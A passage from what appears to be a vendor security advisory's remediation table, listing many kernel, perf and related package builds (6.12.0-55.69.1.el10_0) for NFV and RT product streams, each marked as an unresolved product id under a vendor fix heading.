Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
